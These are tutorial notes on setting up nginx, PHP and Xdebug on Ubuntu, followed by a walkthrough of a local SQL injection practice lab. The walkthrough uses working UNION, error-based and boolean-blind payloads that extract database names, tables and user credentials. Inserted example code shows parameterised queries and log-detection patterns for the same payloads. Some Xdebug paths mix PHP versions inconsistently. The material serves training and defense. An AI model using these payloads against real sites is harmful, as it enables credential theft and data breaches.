Installing nginx and deploying PHP on Ubuntu
1. Install the dependency packages
root@admin123-virtual-machine:~# apt-get install gcc libpcre3 libpcre3-dev zlib1g zlib1g-dev openssl libssl-dev
2. Install nginx
Download nginx from https://nginx.org/en/download.html
Then transfer the archive to the /usr/local/nginx directory on Ubuntu using Xftp
root-virtual-machine:/usr/local/nginx# tar -vxf nginx-1.20.2.tar.gz
3. Check whether anything is missing from the build environment
root-virtual-machine:/usr/local/nginx/nginx-1.20.2# ./configure
4. Compile
root-virtual-machine:/usr/local/nginx/nginx-1.20.2# make && make install
5. Start nginx
root-virtual-machine:/usr/local/nginx/sbin# ./nginx
6. Access nginx
7. Add the PHP package source
root-virtual-machine:~# sudo apt-get install software-properties-common
root-virtual-machine:~# sudo add-apt-repository -y ppa:ondrej/php
root-virtual-machine:~# sudo apt-get install php7.3
8. Install PHP
root-virtual-machine:~# sudo apt-get install php7.3-mysql php7.3-fpm php7.3-curl php7.3-xml php7.3-gd php7.3-mbstring php-memcached php7.3-zip
9. Change the listening port
root-virtual-machine:/etc/php/7.3/fpm/pool.d# vim www.conf
10. Start php-fpm and check the status of port 9000
root-virtual-machine:~# sudo service php7.3-fpm start
root-virtual-machine:~# netstat -lnt | grep 9000
11. Test
root-virtual-machine:/usr/local/nginx/html# vim web.php
Debug installation and setup
1. VS Code remote connection
2. Install PHP Debug
Click "Xdebug installation wizard" to open the website
Copy and paste the information from web.php
(1)
root-virtual-machine:~# wget https://xdebug.org/files/xdebug-3.3.2.tgz
(2)
root-virtual-machine:~# apt-get install php7.3-dev autoconf automake
(3)
root-virtual-machine:~# tar -xvzf xdebug-3.3.2.tgz
(4)
root-virtual-machine:~# cd xdebug-3.3.2
(5)
root-virtual-machine:~/xdebug-3.3.2# phpize
(6)
root-virtual-machine:~/xdebug-3.3.2# ./configure
(7)
root-virtual-machine:~/xdebug-3.3.2# make
(8)
root-virtual-machine:~/xdebug-3.3.2# cp modules/xdebug.so /usr/lib/php/20230831/
(9)
root-virtual-machine:~/xdebug-3.3.2# vim /etc/php/8.3/fpm/conf.d/99-xdebug.ini
(10)
root-virtual-machine:~/xdebug-3.3.2# service php7.3-fpm restart
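SQL injection: installing the practice lab
Download the lab and extract it to phpstudy_pro/WWW
Change the database configuration file
Enter the lab
Setup/reset Database for labs
Less-01
SQL injection workflow
1. Find the injection point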
http://localhost/sqliabs/Less-1/?id=1
2. Determine whether the parameter is numeric or string type
String type
3. Determine how the value is closed
http://localhost/sqliabs/Less-1/?id=1'
Closed with a single quote
4. Verify that the database executes the input, i.e. whether a SQL vulnerability exists
If:
http://localhost/sqliabs/Less-1/?id=1' and 1=1 --+
returns output
http://localhost/sqliabs/Less-1/?id=1' and 1=2 --+
returns no output
then the vulnerability exists
5. Determine the number of columns
http://localhost/sqliabs/Less-1/?id=1' order by 10 --+
An error is returned, so there are not 10 columns
http://localhost/sqliabs/Less-1/?id=1' order by 3 --+
No error, which shows there are 3 columns
6. UNION query: determine the echo positions
http://localhost/sqliabs/Less-1/?id=-1' union select 1,2,3 --+
The 2 and 3 show that the data in the 2nd and 3rd positions of the UNION query is displayed after Your Login name and Your Password
7. Query the database name
http://localhost/sqliabs/Less-1/?id=-1' union select 1,database(),3 --+
Database name: security
8. Query the table names
http://localhost/sqliabs/Less-1/?id=-1' union select 1,(select group_concat(table_name)from information_schema.tables where table_schema='security'),3 --+
Four tables: emails referers uagents users
9. Query the column names
http://localhost/sqliabs/Less-1/?id=-1' union select 1,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'),3 --+
Three column names: id username password
10. Query the actual data
http://localhost/sqliabs/Less-1/?id=-1' union select 1,(select group_concat(username)from users),(select group_concat(password)from users) --+
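The accounts and passwords are retrieved; the level is cleared.
Less-02 to Less-04 are solved in essentially the same way as Less-01; only the closing delimiter differs
Less-05
There is no echo position, so UNION injection cannot be used; error-based injection can be used instead
Query the database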
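The observations in steps 3 to 6 are what a query produces when it pastes the id parameter between single quotes. The following is an added example, not code from the lab or from this page: it reproduces those observations on an in-memory SQLite table (a stand-in for the lab's MySQL database, with constructed rows) and runs the same inputs through a bound-parameter version. The function names and the exact query text are assumptions.

```python
import sqlite3

def make_db():
    # Constructed rows standing in for the lab's users table (SQLite, not MySQL).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "alice", "pw-one"), (2, "bob", "pw-two")])
    return db

def lookup_concat(db, user_id):
    # Vulnerable pattern: the request parameter is pasted between single quotes,
    # so a quote in the input ends the string and the rest is parsed as SQL.
    sql = "SELECT * FROM users WHERE id='" + user_id + "' LIMIT 0,1"
    try:
        return db.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return "SQL error: %s" % exc

def lookup_bound(db, user_id):
    # Hardened pattern: reject non-numeric ids, then bind the value so it is
    # always treated as data and never as SQL text.
    if not user_id.isdecimal():
        return None
    sql = "SELECT * FROM users WHERE id = ? LIMIT 0,1"
    return db.execute(sql, (int(user_id),)).fetchone()

# Parameter values from steps 3-6 after URL decoding ("--+" becomes "-- ").
PROBES = ["1", "1'", "1' and 1=1 -- ", "1' and 1=2 -- ",
          "1' order by 10 -- ", "1' order by 3 -- ",
          "-1' union select 1,2,3 -- "]

def compare(db):
    # Map each input to (result of concatenated query, result of bound query).
    return {p: (lookup_concat(db, p), lookup_bound(db, p)) for p in PROBES}

if __name__ == "__main__":
    for probe, (weak, strong) in compare(make_db()).items():
        print("%-30r concat=%r bound=%r" % (probe, weak, strong))
```

With the bound version every input except the plain `1` returns nothing, because the quote never reaches the SQL parser.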
http://localhost/sqliabs/Less-5/?id=-1' union select updatexml(1,concat('~',(select database()),'~'),1) --+
Database name: security
Query the table names
http://localhost/sqliabs/Less-5/?id=-1' union select 1,updatexml(1,concat('~',(select group_concat(table_name)from information_schema.tables where table_schema='security'),'~'),1),3 --+
Four tables: emails referers uagents users
Query the column names
http://localhost/sqliabs/Less-5/?id=-1' union select 1,updatexml(1,concat('~',(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'),'~'),1),3 --+
Three column names: id username password
Query the accounts and passwords
http://localhost/sqliabs/Less-5/?id=-1' union select 1,updatexml(1,concat('~',(select group_concat(username)from users),'~'),1),3 --+
http://localhost/sqliabs/Less-5/?id=-1' union select 1,updatexml(1,concat('~',(select group_concat(password)from users),'~'),1),3 --+
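Passed successfully.
Less-06 and Less-07 are solved in essentially the same way as Less-05; only the closing delimiter differs
Less-08
Errors are not displayed
But there is a true/false difference: correct input displays "You are in……", incorrect input displays nothing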
http://localhost/sqliabs/Less-8/?id=1' and 1=1 --+
http://localhost/sqliabs/Less-8/?id=1' and 1=2 --+
Use boolean-based blind injection:
Use the length() function to blindly determine the length of the database name
http://localhost/sqliabs/Less-8/?id=1' and length(database())>10 --+
No output, so the condition is false: the database name length is less than 10
http://localhost/sqliabs/Less-8/?id=1' and length(database())=8 --+
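Output is shown, so the condition is true; after several attempts the database name length is determined to be 8
Use the substr function to determine each character of the database name; by varying the value of x in ascii(substr(database(),x,1)) we can determine the exact value of each position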
http://localhost/sqliabs/Less-8/?id=1' and ascii(substr(database(),1,1))>70 --+
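This is tedious, so not every step is shown; the database name is finally determined to be 'security'
Use the left function: with left((select table_name from information_schema.tables where table_schema=database() limit x,1),y), varying the values of x and y gives us all the table names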
http://localhost/sqliabs/Less-8/?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)='users' --+
Determine the column names the same way:
http://localhost/sqliabs/Less-8/?id=1' and left((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),8)='username' --+
Determine the specific users and passwords the same way
http://localhost/sqliabs/Less-8/?id=1' and left((select username from users limit x,1),y)="" --+
The process is too tedious to show step by step
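Each request shape used above (quote plus comparison, ORDER BY probing, UNION SELECT, updatexml, and the length/ascii/substr/left comparisons) is visible in the web server's access log. The following is an added example, not part of the original notes: it scans nginx "combined" log lines for those shapes and counts hits per client. The rule names, the log format and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qsl, urlsplit

# Heuristic signatures for the request shapes used in this walkthrough.
# They are hints for log review, not a substitute for fixing the query.
RULES = [
    ("quote-and-compare", re.compile(r"'\s*and\s+\d+\s*=\s*\d+", re.I)),
    ("order-by-probe", re.compile(r"'\s*order\s+by\s+\d+", re.I)),
    ("union-select", re.compile(r"\bunion\s+select\b", re.I)),
    ("error-based", re.compile(r"\bupdatexml\s*\(", re.I)),
    ("schema-enum", re.compile(r"\binformation_schema\b", re.I)),
    ("boolean-blind",
     re.compile(r"'\s*and\s+(?:length|ascii|substr|left)\s*\(", re.I)),
]

# Client address and request target of an nginx "combined" access-log line.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IP ranges), not captured traffic.
TS = "[01/Jan/2024:10:00:00 +0000]"
SAMPLE_LOG = [
    '192.0.2.10 - - %s "GET /sqliabs/Less-1/?id=1 HTTP/1.1" 200 721' % TS,
    '198.51.100.7 - - %s "GET /sqliabs/Less-1/?id=1%%27%%20and%%201=2%%20--+ HTTP/1.1" 200 650' % TS,
    '198.51.100.7 - - %s "GET /sqliabs/Less-1/?id=1%%27%%20order%%20by%%203%%20--+ HTTP/1.1" 200 721' % TS,
    '198.51.100.7 - - %s "GET /sqliabs/Less-1/?id=-1%%27%%20union%%20select%%201,database(),3%%20--+ HTTP/1.1" 200 730' % TS,
    '198.51.100.7 - - %s "GET /sqliabs/Less-5/?id=-1%%27%%20union%%20select%%201,updatexml(1,concat(%%27~%%27,(select%%20database()),%%27~%%27),1),3%%20--+ HTTP/1.1" 200 700' % TS,
    '198.51.100.7 - - %s "GET /sqliabs/Less-8/?id=1%%27%%20and%%20length(database())=8%%20--+ HTTP/1.1" 200 706' % TS,
    '198.51.100.7 - - %s "GET /sqliabs/Less-8/?id=1%%27%%20and%%20ascii(substr(database(),1,1))%%3E70%%20--+ HTTP/1.1" 200 706' % TS,
]

def scan(lines):
    """Return {client_ip: Counter(rule_name -> hits)} for suspicious requests."""
    report = defaultdict(Counter)
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        client, target = m.groups()
        # parse_qsl URL-decodes each value, so %27 and + are matched as ' and space.
        for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            for rule, rx in RULES:
                if rx.search(value):
                    report[client][rule] += 1
    return dict(report)

if __name__ == "__main__":
    for client, hits in scan(SAMPLE_LOG).items():
        print(client, dict(hits))
```

A run of boolean-blind hits from one client is the log signature of the character-by-character comparisons described for Less-08.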